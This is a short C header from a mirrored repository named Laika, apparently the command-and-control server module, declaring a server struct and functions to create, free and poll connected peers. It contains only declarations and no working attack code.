mirror of
https://github.com/CPunch/Laika.git
synced 2024-11-22 04:50:06 +00:00
21 lines
468 B
C
21 lines
468 B
C
#ifndef LAIKA_CNC_H
|
|
#define LAIKA_CNC_H
|
|
|
|
#include "laika.h"
|
|
#include "lpacket.h"
|
|
#include "lsocket.h"
|
|
#include "lpolllist.h"
|
|
#include "lpeer.h"
|
|
|
|
struct sLaika_cnc {
|
|
struct sLaika_socket sock;
|
|
struct sLaika_pollList pList;
|
|
};
|
|
|
|
struct sLaika_cnc *laikaC_newCNC(uint16_t port);
|
|
void laikaC_freeCNC(struct sLaika_cnc *cnc);
|
|
|
|
void laikaC_killPeer(struct sLaika_cnc *cnc, struct sLaika_peer *peer);
|
|
bool laikaC_pollPeers(struct sLaika_cnc *cnc, int timeout);
|
|
|
|
#endif |